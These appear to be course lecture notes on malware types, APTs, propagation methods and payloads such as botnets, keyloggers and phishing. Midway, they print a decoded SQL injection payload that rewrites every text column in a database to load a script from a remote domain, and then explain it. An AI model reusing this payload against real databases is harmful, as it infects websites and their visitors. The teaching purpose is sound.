Tip: If anyone wants to speed up the lecture videos a little,
inspect the page, go to the browser console, and paste this in:
document.querySelector('video').playbackRate = 1.2
1.2 Definitions
Malware is software that is installed onto a system, usually
covertly, with the intent of compromising the confidentiality,
integrity, or availability of the victim’s data, applications, operating
system, hardware, peripherals, sensors, or otherwise annoying or
disrupting the victim.
How it spreads or propagates to reach the desired
targets
Actions or payloads it performs once a target is
reached
Also classified by:
Those that need a host program (parasitic code such
as viruses)
Those that are independent, self-contained programs
(worms, trojans, and bots)
Malware that does not replicate (trojans and spam
e-mail)
Malware that does replicate (viruses and
worms)
1.2.2 Types
Types of Malicious Software (Malware)
Propagation mechanism include examples such as:
Infection of existing content by viruses that is
subsequently spread to other systems
Exploit of software vulnerabilities by worms or
drive-by-downloads to allow the malware to replicate
Social engineering attacks that convince users to
bypass security mechanisms to install Trojans or to
respond to phishing attacks
Payload actions performed by malware once it reaches
a target system can include examples such as:
Corruption of system or data files
Theft of service can make the system a
zombie agent of attack as part of a botnet
Theft of information from the
system/key-logging
Code for stealthing or hiding its
presence on the system (not exclusive with others, but complements
others)
1.3 Attack sources
Individuals just tinkering
Hacktivists
More organized and dangerous attack sources such as:
politically motivated attackers, organized
criminals, organizations selling services to nations or
companies, and government agencies
More resources and motivation behind malware and has led to
development of a large underground economy involving the sale of attack
kits, access to compromised hosts, and to stolen information
1.3.1 Advanced Persistent Threats
(APTs)
Well-resourced, persistent application of a wide variety of
intrusion technologies and malware to selected targets (usually business
or political)
Typically attributed to state-sponsored organizations and criminal
enterprises
Differ from other types of attack by their careful target selection
and stealthy intrusion efforts over extended periods
High profile attacks include Aurora, RSA, APT1, and Stuxnet
1.3.1.1 APT Characteristics
Advanced
Use a wide variety of intrusion technologies and malware including
the development of custom malware if required
Individual components may not necessarily be technically advanced
but are carefully selected to suit the chosen target
Persistent
Determined application of attacks over an extended period against
the chosen target
A variety of attacks may be progressively applied until the target
is compromised
Threats
Organized, capable, and well-funded attackers intent to compromise
the specifically chosen targets
Active involvement of people in the process greatly raises the
threat level from that due to automated attacks tools, and also the
likelihood of successful attacks
1.3.1.2 APT Attacks
Aim:
Varies from theft of intellectual property, or security related data
to the physical disruption of infrastructure, ultimately often for the
purpose of resource acquisition and theft, the business of organized
crime and nation states.
Techniques used:
Social engineering
Spear-phishing email
Drive-by-downloads from selected compromised websites likely to be
visited by personnel in the target organization
Intent:
To infect the target with sophisticated malware with multiple
propagation mechanisms and payloads
Once they have gained initial access to systems in the target
organization a further range of attack tools are used to maintain and
extend their access
1.3.1.3 APT examples
Two examples from organized entities with a monopoly on violence and
profit-driven interest in power by force:
Check out the source code from a successful example:
https://en.wikipedia.org/wiki/Carbanak
“A look under the hood of FIN7’s notorious Carbanak backdoor, the result
of nearly 500 total hours of analysis across 100,000 lines of code, and
dozens of binaries, shows that the malware is highly sophisticated, more
sophisticated than expected. It’s a Cadillac in a sea of golf carts, if
you will. That’s according to analysis from FireEye researchers, who
said that notably, the malware (which has been used in hundreds if not
thousands of successful, financially motivated cyberattacks in the past
four years) has an entirely different approach to command-and-control
(C2) communication than what’s typically seen in the wild.”
Malware has move from a hobbyist industry into a profitable
high-throughput production industry.
1.4.1 Historical
Initially the development and deployment of malware required
considerable technical skill by software authors.
1.4.2 Attack kits
The development of virus-creation tool-kit in the early 1990s and
then more general attack kits in the 2000s greatly assisted in the
development and deployment of malware
Tool-kits are often known as “crime-ware”
Include a variety of propagation mechanisms and payload modules that
even novices can deploy
Variants that can be generated by attackers using these tool-kit
creates a significant problem for those defending systems against
them
Widely used tool-kit include:
Zeus, Blackhole, Sakura, Phoenix are examples, if you are
interested…
1.5 Propagation
How does malware get around?
This is a commonly mis-understood area, even within the
technologically literate.
1.5.1 Viruses
Piece of software that infects programs
Modifies them to include a copy of the virus
Replicates and goes on to infect other content
Easily spread through network environments
When attached to an executable program a virus has permissions of
the program
Executes secretly when the host program is run
Specific to operating system and hardware
1.5.1.1 Virus features
Infection mechanism
Means by which a virus spreads or propagates
Also referred to as the infection vector
Trigger
Event or condition that determines when the payload is activated or
delivered
Sometimes known as a logic bomb
Usually executing downloaded software
Payload
What the virus does (besides spreading)
May involve damage, benign but noticeable activity, or hidden
activity such as keylogging
1.5.1.2 Virus phases
These phases may overlap in the phase or state of a particular virus,
but the general principles still apply:
Dormant
Virus is idle
Will eventually be activated by some event
Not all have this stage
Triggering
Virus is activated to perform the function for which it was
intended
Can be caused by a variety of system events, usually launching a
downloaded binary.
Propagation
Virus places a copy of itself into other programs or into certain
system areas on the disk
May not be identical to the propagating version
Each infected program will now contain a clone of the virus which
will itself enter a propagation phase
Execution
Function is performed (may be damaging or not)
1.5.1.3 Virus Classification by
target
Boot sector infector: Infects a master boot record
or boot record and spreads when a system is booted from the disk
containing the virus, thus being more difficult to eliminate.
File infector: Infects files that the operating
system or shell considers to be executable
Macro virus: Infects files with macro or scripting
code that is interpreted by an application, e.g., Microsoft excel macro
virus.
Multipartite virus: Infects files in multiple
ways
1.5.1.4 Virus Classification by
concealment strategy
Encrypted virus: A portion of the virus creates
a random encryption key and encrypts the remainder of the virus, often
for the purpose of stealthing
Stealth virus: A form of virus explicitly
designed to hide itself from detection by anti-virus software
Polymorphic virus: A virus that mutates with
every infection, often for the purpose of stealthing
Metamorphic virus: A virus that mutates and
rewrites itself completely at each iteration and may change behavior as
well as appearance, often for the purpose of stealthing
Often, one might notice that an infected binary file might change
in size.
But, compression can mask changes in file size:
To know that a file has not been infected, one mechanism of detection is
to compare hashes (e.g., sha256) between a know good state and a suspect
binary.
Macro and Scripting Viruses
For example, basic spreadsheet macro viruses
Very common in mid-1990s
Platform independent
Infect documents (not executable portions of code)
Easily spread
Exploit macro capability of MS Office applications
More recent releases of products include protection
Various anti-virus programs have been developed so these are no
longer the predominant virus threat
1.5.2 Worms
Program that actively seeks out more machines to infect and each
infected machine serves as an automated launching pad for attacks on
other machines
Exploits software vulnerabilities in client or server programs
Can use network connections to spread from system to system
Spreads through shared media (USB drives, CD, DVD data disks)
E-mail worms spread in macro or script code included in attachments
and instant messenger file transfers
Upon activation the worm may replicate and propagate again
Usually carries some form of payload
First known implementation was done in Xerox Palo Alto Labs in the
early 1980s
1.5.2.1 Worm Replication
Electronic mail or instant messaging: Worm e-mails
a copy of itself to other systems. Sends itself as an attachment via an
instant message service
File sharing: Creates a copy of itself or infects a
file as a virus on removable media
Remote execution capability: Worm executes a copy
of itself on another system
Remote file access or transfer capability: Worm
uses a remote file access or transfer service to copy itself from one
system to the other
Remote login capability: Worm logs onto a remote
system as a user and then uses commands to copy itself from one system
to the other
1.5.2.2 Target Discovery
First function in the propagation phase for a network worm
Searches for other systems to infect
Ask/discuss:
What does this mean for leaving legacy computers on the internet,
even if they are not used?
Must a computer be used by a human to be infected?
1.5.2.3 Scanning strategies
Random
Each compromised host probes random addresses in the IP address
space using a different seed
Produces a high volume of Internet traffic which may cause
generalized disruption even before the actual attack
Hit list
Attacker compiles list of potential vulnerable machines
Once the list is compiled the attacker begins infecting machines on
the list
Each infected machine given portion of list to scan
Results in a very short scanning period which may make it difficult
to detect infection
Topological
This method uses information contained on an infected victim machine
to find more hosts to scan
Local subnet
If a host can be infected behind a firewall that host then looks for
targets in its own local network using subnet address structure
1.5.2.4 Simple propagation
model
Similar to real infection modeling, where infection confers
functional immunity or death.
dI(t)/dt = B * I(t) * S(t)
I(t) = number of individuals infected as of time t
S(t) = number of susceptible individuals (susceptible to infection
but not yet infected) at time t
After we decode it, we can see the code below.
What does this do?
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FORSELECT
a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id ANDa.xtype='u' AND (b.xtype=99 OR
b.xtype=35 OR b.xtype=231 OR b.xtype=167)OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO
@T,@CWHILE(@@FETCH_STATUS=0) BEGIN
EXEC('UPDATE ['+@T+'] SET['+@C
+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))
+''<scriptsrc=
http://www.ibse.ru/js.js
></script>~~~) FETCH
NEXT FROM Table_CursorINTO @T,@C END CLOSE
Table_Cursor DEALLOCATE Table_Cursor
Goes through all character fields in a database, and adds a script
tag to them, downloaded from a remote url from a Russian domain…
1.5.3 Mobile phone malware
Very much up-and-coming - the phone ecosystem is an insecure
mess!
First discovery was Cabir worm in 2004
Then Lasco and CommWarrior in 2005
Communicate through Bluetooth wireless connections or MMS
Target is the smartphone
Can completely disable the phone, delete data on the phone, or force
the device to send costly messages
CommWarrior replicates by means of Bluetooth to other phones, sends
itself as an MMS file to contacts and as an auto reply to incoming text
messages
1.5.4 Mobile (cross-platform)
code
This does NOT refer to mobile phone malware above
Programs that can be shipped unchanged to a variety of
platforms
Transmitted from a remote system to a local system and then executed
on the local system
Often acts as a mechanism for a virus, worm, or Trojan horse
Takes advantage of vulnerabilities to perform its own exploits
Popular vehicles include Java applets, ActiveX, JavaScript and
VBScript
What about the user’s mistakes?
1.5.5 Drive-by-downloads
When the user views a website controlled by the attacker, malware
exploits browser vulnerabilities, to download and install malware on the
user’s system.
In most cases does not actively propagate
Spreads when users visit the malicious Web page
1.5.6 Click-jacking
Also known as a user-interface (UI) redress attack
Front-end display of browser can be modified, to create illusory
deceptive content, often a form-fill.
Adobe Flash or JavaScript
A typical attack uses multiple transparent or opaque layers to trick
a user into clicking on a button or link on another page when they were
intending to click on the top level page
Similarly, keystrokes can also be hijacked
A user can be led to believe they are typing in the password to
their email or bank account, but are instead typing into an invisible
frame controlled by the attacker
The attacker can force the user to do a variety of things from
adjusting the user’s computer setters to unwittingly sending the user to
Web sites that might have malicious code
The attacker is hijacking clicks meant for one page and routing them
to another page
1.5.7 Social engineering
The most successful type of attack by far!
Spam
Unsolicited bulk e-mail
Significant carrier of malware
phishing and spear phishing
Trojan horse
Program or utility containing harmful hidden code
Used to accomplish functions that the attacker could not accomplish
directly
Mobile phone trojans
Un-trusted sources (This means most of the major app stores like
Apple and Android, where a significant fraction of the software contains
malware)
++++++++++++++++++++++
Cahoot-14.1
1.6 Payload
Malicious software or actions that malware may deliver or perform
1.6.1 System corruption
Real-world damage
Cause damage to physical equipment
Chernobyl virus rewrites BIOS code
Stuxnet worm
May target specific industrial control system software
There are concerns about using sophisticated targeted malware for
industrial sabotage
Logic bomb: Code embedded in the malware that is set to “explode”
when certain conditions are met
1.6.2 Bots
Takes over another Internet attached computer and uses that computer
to launch or manage attacks
Botnet - collection of bots capable of acting in a coordinated
manner
Sality is the classification for a family of malicious software
(malware), which infects files on Microsoft Windows systems.
Sality was first discovered in 2003 and has advanced over the years
to become a dynamic, enduring and full-featured form of malicious
code.
Systems infected with Sality may communicate over a peer-to-peer
(P2P) network to form a botnet for the purpose of relaying spam,
proxying of communications, exfiltrating sensitive data, compromising
web servers and/or coordinating distributed computing tasks for the
purpose of processing intensive tasks (e.g. password cracking).
Since 2010, certain variants of Sality have also incorporated the
use of rootkit functions as part of an ongoing evolution of the malware
family.
Because of its continued development and capabilities, Sality is
considered to be one of the most complex and formidable forms of malware
to date.
1.6.3 Information Theft:
key-loggers and Spyware
1.6.3.1 Key-loggers
Captures keystrokes to allow attacker to monitor sensitive
information
Typically uses some form of filtering mechanism that only returns
information close to keywords (“login”, “password”)
1.6.3.2 Spyware
Subverts the compromised machine to allow monitoring of a wide range
of activity on the system
Monitoring history and content of browsing activity
Redirecting certain Web page requests to fake sites
Dynamically modifying data exchanged between the browser and certain
Web sites of interest
1.6.3.3 Phishing
Exploits social engineering to leverage the user’s trust by
masquerading as communication from a trusted source
Include a URL in a spam e-mail that links to a fake Web site that
mimics the login page of a banking, gaming, or similar site
Suggests that urgent action is required by the user to authenticate
their account
Attacker exploits the account using the captured credentials
1.6.3.4 Spear Phishing
Recipients are carefully researched by the attacker
E-mail is crafted to specifically suit its recipient, often quoting
a range of information to convince them of its authenticity
